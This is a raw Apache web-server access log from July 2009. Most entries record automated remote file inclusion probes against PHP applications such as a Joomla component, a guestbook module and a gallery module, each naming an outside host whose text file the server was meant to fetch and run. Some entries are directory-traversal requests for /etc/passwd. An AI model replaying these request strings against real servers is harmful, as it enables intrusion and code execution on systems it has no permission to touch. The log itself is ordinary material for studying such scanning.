64.191.102.117 - - [10/Jul/2009:02:37:02 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:02 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:02 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:02 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:02 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:04 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:04 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:04 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:04 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:04 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:04 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:40 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:40 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:40 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:53 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:53 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:37:53 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:38:32 -0400] "GET /logs/index.php?Load=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:38:32 -0400] "GET /index.php?Load=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:38:32 -0400] "GET /logs/access_log.Q109062900%20%20/index.php?Load=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:38:41 -0400] "GET /logs/access_log.Q109051400%20%20/index.php?Load=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:38:46 -0400] "GET /logs/access_log.Q109062900%20%20/index.php?Load=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:38:46 -0400] "GET /logs/index.php?Load=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:38:46 -0400] "GET /index.php?Load=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:02:38:46 -0400] "GET /logs/access_log.Q109051400%20%20/index.php?Load=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:02:39:04 -0400] "GET /logs/access_log.Q109051100//include/admin.lib.inc.php?site_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
205.234.187.238 - - [10/Jul/2009:02:39:05 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.811"
205.234.187.238 - - [10/Jul/2009:02:39:05 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.811"
58.227.193.198 - - [10/Jul/2009:02:39:21 -0400] "GET /logs/access_log.Q109051200//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.227.193.198 - - [10/Jul/2009:02:39:21 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:02:39:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [10/Jul/2009:02:39:49 -0400] "GET /logs/access_log.Q109070300//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://netseoul.com/gboard/rs/copyright.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:39:52 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:39:52 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:39:52 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:40:09 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:40:09 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:40:09 -0400] "GET /logs/access_log.Q109052800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
124.0.146.100 - - [10/Jul/2009:02:40:45 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
211.236.242.164 - - [10/Jul/2009:02:40:46 -0400] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:40:46 -0400] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:40:46 -0400] "GET /logs/access_log.Q109051700///s_loadenv.inc.php?DOCUMENT_ROOT=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
124.0.146.100 - - [10/Jul/2009:02:40:48 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:40:48 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
211.236.242.164 - - [10/Jul/2009:02:41:08 -0400] "GET /logs/access_log.Q109051400///s_loadenv.inc.php?DOCUMENT_ROOT=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
75.126.128.202 - - [10/Jul/2009:02:41:13 -0400] "GET /logs/access_log.Q109051700%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
75.126.128.202 - - [10/Jul/2009:02:41:13 -0400] "GET /logs/access_log.Q109051400%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.0.146.100 - - [10/Jul/2009:02:41:24 -0400] "GET /logs/access_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.0.146.100 - - [10/Jul/2009:02:41:24 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.0.146.100 - - [10/Jul/2009:02:41:24 -0400] "GET /logs/access_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.0.146.100 - - [10/Jul/2009:02:41:25 -0400] "GET /logs/access_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 274 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.0.146.100 - - [10/Jul/2009:02:41:25 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.0.146.100 - - [10/Jul/2009:02:41:25 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.0.146.100 - - [10/Jul/2009:02:41:35 -0400] "GET /logs/access_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:41:35 -0400] "GET /logs/access_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:41:36 -0400] "GET /logs/access_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:41:36 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:41:36 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:41:36 -0400] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:41:37 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:41:37 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:41:37 -0400] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
64.191.102.117 - - [10/Jul/2009:02:41:37 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.191.102.117 - - [10/Jul/2009:02:41:47 -0400] "GET /logs/access_log.Q109052800%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:02:42:57 -0400] "GET /logs/access_log.Q109053000//include/admin.lib.inc.php?site_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
66.249.68.70 - - [10/Jul/2009:02:43:13 -0400] "GET /images/items/0032973_thumb.jpg HTTP/1.1" 200 1703 "-" "Googlebot-Image/1.0"
211.206.120.187 - - [10/Jul/2009:02:44:33 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:02:44:33 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.206.120.187 - - [10/Jul/2009:02:44:33 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:02:44:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [10/Jul/2009:02:45:09 -0400] "GET /?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
124.0.146.100 - - [10/Jul/2009:02:45:09 -0400] "GET /logs/error_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.0.146.100 - - [10/Jul/2009:02:45:09 -0400] "GET /logs/error_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
124.0.146.100 - - [10/Jul/2009:02:45:09 -0400] "GET /logs/error_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 273 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
201.232.54.48 - - [10/Jul/2009:02:45:09 -0400] "GET /logs/access_log.Q109051900/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
201.232.54.48 - - [10/Jul/2009:02:45:09 -0400] "GET /logs/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 8922 "-" "libwww-perl/5.805"
201.232.54.48 - - [10/Jul/2009:02:45:09 -0400] "GET /logs/access_log.Q109051900/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
201.232.54.48 - - [10/Jul/2009:02:45:09 -0400] "GET /logs/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 8922 "-" "libwww-perl/5.805"
201.232.54.48 - - [10/Jul/2009:02:45:09 -0400] "GET /?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
201.232.54.48 - - [10/Jul/2009:02:45:34 -0400] "GET /logs/access_log.Q109052300/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
201.232.54.48 - - [10/Jul/2009:02:45:36 -0400] "GET /logs/access_log.Q109052300/?sourcedir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
216.117.172.131 - - [10/Jul/2009:02:46:19 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:02:46:19 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:02:46:19 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:02:46:26 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:02:46:27 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
216.117.172.131 - - [10/Jul/2009:02:46:27 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
124.0.146.100 - - [10/Jul/2009:02:46:38 -0400] "GET /logs/error_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:48:08 -0400] "GET /logs/error_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
124.0.146.100 - - [10/Jul/2009:02:48:14 -0400] "GET /logs/error_log.Q109051300/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://law-rich.co.kr///db_control/download/id2.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
114.32.40.221 - - [10/Jul/2009:02:48:57 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:02:48:57 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:02:49:02 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:02:49:25 -0400] "GET /logs/access_log.Q109052400//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:02:49:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.32.40.221 - - [10/Jul/2009:02:50:16 -0400] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:02:50:16 -0400] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:02:50:21 -0400] "GET /logs/access_log.Q109063000%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
74.6.22.189 - - [10/Jul/2009:02:50:45 -0400] "GET /logs/access_log.Q109063000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.236.242.164 - - [10/Jul/2009:02:50:59 -0400] "GET /logs/access_log.Q109051400%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:02:51:00 -0400] "GET /logs/access_log.Q109052500%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.178.116.28 - - [10/Jul/2009:02:51:07 -0400] "GET /logs/access_log.Q109051700///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
66.178.116.28 - - [10/Jul/2009:02:51:07 -0400] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
66.178.116.28 - - [10/Jul/2009:02:51:07 -0400] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:51:20 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:51:20 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:51:20 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:02:52:41 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:02:52:41 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:02:52:41 -0400] "GET /logs/access_log.Q109052200//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
92.50.143.90 - - [10/Jul/2009:02:53:58 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 200 454 "-" "libwww-perl/5.803"
92.50.143.90 - - [10/Jul/2009:02:53:58 -0400] "GET /logs/access_log.Q109061500////?_SERVER[DOCUMENT_ROOT]=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
92.50.143.90 - - [10/Jul/2009:02:53:58 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://eng.nevskydvor.ru/php/id.txt?%0D?? HTTP/1.1" 200 8929 "-" "libwww-perl/5.803"
66.178.116.28 - - [10/Jul/2009:02:53:59 -0400] "GET /logs/access_log.Q109051400///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:54:25 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:02:54:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.124.127.34 - - [10/Jul/2009:02:55:18 -0400] "GET /logs/access_log.Q109052200%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:02:55:19 -0400] "GET /logs/access_log.Q109062500%20%20//modules/TotalCalendar/about.php?inc_dir=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.32.40.221 - - [10/Jul/2009:02:55:26 -0400] "GET /logs/access_log.Q109051200%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:02:55:43 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
65.254.32.2 - - [10/Jul/2009:02:55:43 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.moist.se/remember.txt??????????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
